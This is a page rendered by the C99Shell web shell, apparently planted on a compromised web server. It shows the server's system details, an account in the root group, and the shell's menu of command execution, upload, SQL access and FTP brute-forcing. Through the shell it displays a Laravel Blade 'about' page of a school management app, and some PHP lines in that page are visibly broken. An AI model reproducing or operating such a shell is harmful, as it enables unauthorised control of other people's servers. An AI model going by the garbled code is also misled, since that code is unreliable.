!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/resources/views/superadmin/settings/   drwxr-xr-x
Free 29.42 GB of 117.98 GB (24.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     about.blade.php (5.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('superadmin.navigation')
   
@section('content')

<div class="mainSection-title">
    <div class="row">
        <div class="col-12">
            <div class="d-flex justify-content-between align-items-center">
                <h4>{{ get_phrase('About this application') }}</h4>
            </div>
        </div>
    </div>
</div>

<?php $curl_enabled function_exists('curl_version'); ?>
  
  <div class="row justify-content-center mt-4">
    <div class="col-xl-8">
      <div class="eSection-wrap">
        <div class="row">
            <div class="col-12 p-4">

                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Software version') }}
                  <span class="float-end">{{ get_settings('version') }}</span>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Check update') }}
                  <span class="float-end">
                      <a class="about-sc-one" href="https://codecanyon.net/user/creativeitem/portfolio"
                        target="_blank">
                          <i class="bi bi-telegram"></i>
                            {{ get_phrase('Check update') }}
                      </a>
                  </span>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('PHP version') }}
                  <span class="float-end">{{ phpversion() }}</span>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Curl enable') }}
                  <span class="float-end">
                    <?php echo $curl_enabled '<span class="badge bg-success">'.get_phrase('Enabled').'</span>' '<span class="badge badge-danger">'.get_phrase('disabled').'</span>'?>
                  </span>
                </p>

                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Purchase code') }}
                  <span class="float-end">{{ get_settings('purchase_code') }}</span>
                </p>

                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Product license') }}
                  <?php if($application_details['product_license'] == 'valid'): ?>
                    <span class="float-end badge bg-success text-capitalize">{{ $application_details['product_license'] }}</span>
                  <?php else: ?>
                    <span class="float-end badge bg-danger mt-1 text-capitalize">{{ $application_details['product_license'] }}</span>
                    <button class="btn btn-primary float-end me-2 py-0 text-13px" onclick="rightModal('{{ route('superadmin.save_valid_purchase_code', ['action_type' => 'show']) }}', '{{ get_phrase('Enter valid purchase code') }}');">{{ get_phrase('Enter valid purchase code') }}</button>
                  <?php endif; ?>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Customer support status') }}
                  <span class="float-end">
                    <?php if (strtolower($application_details['purchase_code_status']) == 'expired'): ?>
                      <span class="badge bg-danger float-end mt-1 text-capitalize">{{ $application_details['purchase_code_status'] }}</span>
                      <a href="https://codecanyon.net/user/creativeitem/portfolio" target="_blank" class="btn btn-success float-end me-2 py-0 text-13px">{{ get_phrase('Renew support') }}</a>
                    <?php elseif (strtolower($application_details['purchase_code_status']) == 'valid'): ?>
                      <span class="badge bg-success text-capitalize">{{ $application_details['purchase_code_status'] }}</span>
                    <?php else: ?>
                      <span class="badge bg-danger text-capitalize">{{ $application_details['purchase_code_status'] }}</span>
                    <?php endif; ?>
                  </span>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Support expiry date') }}

                    <?php if ($application_details['support_expiry_date'] != "invalid"): ?>
                        <span class="float-end">{{ $application_details['support_expiry_date'] }}</span>
                    <?php else: ?>
                        <span class="float-end"><span class="badge bg-danger">{{ ucfirst($application_details['support_expiry_date']) }}</span></span>
                    <?php endif; ?>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Customer name') }}
                  <?php if ($application_details['customer_name'] != "invalid"): ?>
                      <span class="float-end">{{ $application_details['customer_name'] }}</span>
                  <?php else: ?>
                      <span class="float-end"><span class="badge bg-danger">{{ ucfirst($application_details['customer_name']) }}</span></span>
                  <?php endif; ?>
                </p>
                <p class="border-bottom mb-2 pb-2 text-13px">
                  <i class="bi bi-arrow-right-square me-3"></i> {{ get_phrase('Get customer support') }}
                  <span class="float-end"><a class="about-sc-one" href="http://support.creativeitem.com" target="_blank"> <i class="bi bi-telegram"></i> {{ get_phrase('Customer support') }} </a> </span>
                </p>
            </div>
        </div>
                
      </div>
    </div>
  </div>

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--